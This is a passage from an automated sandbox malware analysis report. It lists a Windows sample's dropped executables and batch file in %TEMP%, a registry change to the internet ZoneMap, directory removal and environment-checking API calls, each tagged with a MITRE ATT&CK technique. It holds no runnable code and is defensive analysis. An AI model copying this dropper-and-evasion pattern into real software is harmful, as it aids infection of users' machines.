\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\_vslite.bat:Zone.Identifier\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\GOLFINFO.INI\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\GOLFSET.INI\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to access non-existent file \"C:\\B72AD18CEA301F8CD7993AE4A4E177826477E23E1FF762CCA494510B90A82DF0.EXE.LOCAL\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bucei.exe:ZONE.IDENTIFIER\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\_vslite.bat:ZONE.IDENTIFIER\"\n \"bucei.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\golfset.ini\"\n \"bucei.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bucei.exe.Local\\\"\n \"bucei.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bytudy.exe:Zone.Identifier\"\n \"bucei.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\GOLFSET.INI\"\n \"bucei.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\BUCEI.EXE.LOCAL\"\n \"bucei.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bytudy.exe:ZONE.IDENTIFIER\"\n \"cmd.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\_vslite.bat\"\n \"cmd.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\_VSLITE.BAT\"\n \"bytudy.exe\" trying to access non-existent file \"\\Device\\RasAcd\"\n \"bytudy.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bytudy.exe.Local\\\"\n \"bytudy.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\syzoe.exe:Zone.Identifier\"\n \"bytudy.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\_vslite.bat:Zone.Identifier\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\golfinfo.ini\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\bucei.exe\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\_vslite.bat\"\n \"bucei.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\bytudy.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"syzoe.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%TEMP%\\syzoe.exe]- [targetUID: 00000000-00003640]\n \"_vslite.bat\" has type \"ASCII text with CRLF line terminators\"- Location: [%TEMP%\\_vslite.bat]- [targetUID: 00000000-00002180]\n \"golfinfo.ini\" has type \"Non-ISO extended-ASCII text with very long lines (396) with NEL line terminators\"- Location: [%TEMP%\\golfinfo.ini]- [targetUID: 00000000-00005888]\n \"gbp.ini\" has type \"ISO-8859 text with no line terminators\"- Location: [%TEMP%\\gbp.ini]- [targetUID: 00000000-00000328]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598520'}\" (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598360'}\" (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598536'}\" (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598488'}\" (UID: 00000000-00002180)\n \"bucei.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598520'}\" (UID: 00000000-00005888)\n \"bucei.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598360'}\" (UID: 00000000-00005888)\n \"bucei.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598536'}\" (UID: 00000000-00005888)\n \"bucei.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598488'}\" (UID: 00000000-00005888)\n \"bucei.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15784020'}\" (UID: 00000000-00005888)\n \"bytudy.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598520'}\" (UID: 00000000-00003640)\n \"bytudy.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598360'}\" (UID: 00000000-00003640)\n \"bytudy.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598536'}\" (UID: 00000000-00003640)\n \"bytudy.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598488'}\" (UID: 00000000-00003640)\n \"bytudy.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '3135572'}\" (UID: 00000000-00003640)\n \"bytudy.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '3135604'}\" (UID: 00000000-00003640)\n \"syzoe.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5864912'}\" (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5861600'}\" (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5864952'}\" (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5861640'}\" (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5864992'}\" (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5861680'}\" (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5865032'}\" (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5861720'}\" (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5865112'}\" (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5861800'}\" (UID: 00000000-00000328)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-121", "type": 6, "relevance": 3, "name": "Calls an API typically used to remove a directory", "description": "\"cmd.exe\" called \"RemoveDirectoryW\" with parameter 43003a00 (UID: 00000000-00004204)\n \"cmd.exe\" called \"RemoveDirectoryW\" with parameter %LOCALAPPDATA%\\Temp (UID: 00000000-00000336)", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")\n \"bucei.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")\n \"bytudy.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"syzoe.exe\" called \"FindResourceW\" with parameter \"26291276\" - (UID: 00000000-00000328)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \".text\" is zero\n Raw size of \".?xL\" is zero\n Raw size of \".reloc\" is zero\n Raw size of \".htext\" is zero\n Raw size of \".-(H\" is zero\n Raw size of \"UPX0\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000063006400370039003900330061006500340061003400650031003700370038003200360034003700370065003200330065003100660066003700360032006300630061003400390034003500310030006200390030006100380032006400660030002e00650078006500000000000000 (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebe17650ef28000090fd7f9a5c0d7700f0fd7fb0aa12004490fd7f00000000400000003f0000001d0000000090fd7fa4aa1200c15c0d77608214771d0000000090fd7f9a5c0d7700f0fd7fc8aa120057890c778083147713171e75d8ebe176 (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002180)\n \"bucei.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100007000700044006100740061005c004c006f00630061006c005c00540065006d0070005c00620075006300650069002e0065007800650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebe17648771e0000c0fd7f9a5c0d7700f0fd7f10bf120044c0fd7f00000000400000003f0000001d00000000c0fd7f04bf1200c15c0d77608214771d00000000c0fd7f9a5c0d7700f0fd7f28bf120057890c778083147713171e75d8ebe176 (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005888)\n \"bytudy.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100007000700044006100740061005c004c006f00630061006c005c00540065006d0070005c006200790074007500640079002e006500780065000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebe176709620000070fd7f9a5c0d7700f0fd7fa0c212004470fd7f00000000400000003f0000001f0000000070fd7f94c21200c15c0d77608214771f0000000070fd7f9a5c0d7700f0fd7fb8c2120057890c778083147713171e75d8ebe176 (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003640)\n \"syzoe.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000044f4120002000000000000001000000084f31200a0f31200c9761d750000290000001400da761d7520f14445000000000000346b01000000935c0d7700000000000000000000000068f312000100000038f61200bd061f7560744b3000000000bd14346bc8c92c00 (UID: 00000000-00000328)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"bucei.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005888)\n \"cmd.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004204)\n \"bytudy.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003640)\n \"syzoe.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00000328)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"syzoe.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00000328)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-138", "type": 3, "relevance": 1, "name": "Queries for Borland Delphi related registry entry", "description": "\"syzoe.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\BORLAND\\DELPHI\\LOCALES\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00002180)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetForegroundWindow\" (UID: 00000000-00002180)\n \"bucei.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005888)\n \"bytudy.exe\" called \"GetForegroundWindow\" (UID: 00000000-00003640)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetVersion@KERNEL32.DLL directly followed by \"cmp byte ptr [00556B58h], 00h\" and \"je 00408AF6h\" at 00000000-00000328-64919-1099-00408A78\n Found API call GetVersion@KERNEL32.DLL directly followed by \"cmp edx, 05h\" and \"jne 0040A183h\" at 00000000-00000328-64919-1095-0040A164\n Found API call GetTimeZoneInformation@KERNEL32.DLL directly followed by \"cmp eax, 02h\" and \"jne 00518D4Ah\" at 00000000-00000328-64919-1993-00518D34", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\BUCEI.EXE\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\BUCEI.EXE\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\_VSLITE.BAT\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\_VSLITE.BAT\")\n \"bucei.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\BYTUDY.EXE\")\n \"bucei.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\BYTUDY.EXE\")\n \"bytudy.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SYZOE.EXE\")\n \"bytudy.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SYZOE.EXE\")\n \"bytudy.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\_VSLITE.BAT\")\n \"bytudy.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\_VSLITE.BAT\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-130", "type": 3, "relevance": 1, "name": "Queries TCP/IP interface details", "description": "\"bytudy.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"syzoe.exe\" called \"GetWindowTextW\" (UID: 00000000-00000328)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002600000000007c0126000000000032000000000000005001260046000000d8ab290000000000460000000000000014000000000000000000000000000000000000000000000003000003402429002f02002d0000000000000000000000008000000000000000822200a0209729000100000000000000020000000c00000070af280070af28006baf280000000000000000000000260000000001a0fd12000000000078ff120095e108777e271700feffffff435c0c7750590c7794000000a00000006aaf280068af28009400000000000000fdfebc76000000001800000040085096 (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600e3b8779648bf12006d82b376b4402a0004010000 (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000380063006400370039003900330061006500340061003400650031003700370038003200360034003700370065003200330065003100660066003700360032006300630061003400390034003500310030006200390030006100380032006400660030002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2b0c77a69c0977d8ebe176ac0126000000260000000000000000000400e80035080000000000000000000000000000000000000500e300350800000000000000000000606f260000000000200000000000000000000000 (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600cfbe779624b912006d82b37644422d0004010000 (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600cfbe779624b912006d82b37664442d0004010000 (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002d00f83b0000ff07000000002600000000007f070000c4002600302f26008a24000094b8120067e5097700002600904b2d00000000000000260000000000904b2d00000000003624001280000000384e2d00c4002600987a2c00003b00000000260000000000904b2d00e01000000000260088482d00f83b0000ff07000000002600000000007f070000c40026007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600cfbe779624b912006d82b3760c462d0004010000 (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002d00f83b0000ff07000000002600000000007f070000c4002600302f26005524000094b8120067e5097700002600384d2d00000000000000260000000000384d2d00000000000124002580000000e04f2d00c4002600207a2c00003b00000000260000000000384d2d00e010000000002600304a2d00f83b0000ff07000000002600000000007f070000c40026007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600cfbe779624b912006d82b3763c472d0004010000 (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002d00f83b0000ff07000000002600000000007f070000c4002600302f26002f24000094b8120067e5097700002600684e2d00000000000000260000000000684e2d0000000000db2300f88000000010512d00c4002600207a2c00003b00000000260000000000684e2d00e010000000002600604b2d00f83b0000ff07000000002600000000007f070000c40026007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600cfbe779624b912006d82b3766c482d0004010000 (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002d00f83b0000ff07000000002600000000007f070000c4002600302f26000924000094b8120067e5097700002600984f2d00000000000000260000000000984f2d0000000000b52300968000000040522d00c4002600887a2c00003b00000000260000000000984f2d00e010000000002600904c2d00f83b0000ff07000000002600000000007f070000c40026007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600cfbe779624b912006d82b37694492d0004010000 (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002d00f83b0000ff07000000002600000000007f070000c4002600302f2600e423000094b8120067e5097700002600c0502d00000000000000260000000000c0502d0000000000902300b38000000068532d00c4002600207a2c00003b00000000260000000000c0502d00e010000000002600b84d2d00f83b0000ff07000000002600000000007f070000c40026007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600cfbe779624b912006d82b376c44a2d0004010000 (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002d00f83b0000ff07000000002600000000007f070000c4002600302f2600be23000094b8120067e5097700002600f0512d00000000000000260000000000f0512d00000000006a2300498000000098542d00c4002600887a2c00003b00000000260000000000f0512d00e010000000002600e84e2d00f83b0000ff07000000002600000000007f070000c40026007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600cfbe779624b912006d82b376f44b2d0004010000 (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002d00f83b0000ff07000000002600000000007f070000c4002600302f26009823000094b8120067e509770000260020532d0000000000000026000000000020532d00000000004423006780000000c8552d00c4002600887a2c00003b0000000026000000000020532d00e01000000000260018502d00f83b0000ff07000000002600000000007f070000c40026007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600cfbe779624b912006d82b3761c4d2d0004010000 (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002d00f83b0000ff07000000002600000000007f070000c4002600302f26007323000094b8120067e509770000260048542d0000000000000026000000000048542d00000000001f23003c80000000f0562d00c4002600207a2c00003b0000000026000000000048542d00e01000000000260040512d00f83b0000ff07000000002600000000007f070000c40026007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600cfbe779624b912006d82b376544e2d0004010000 (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"RtlGetVersion\" with parameter 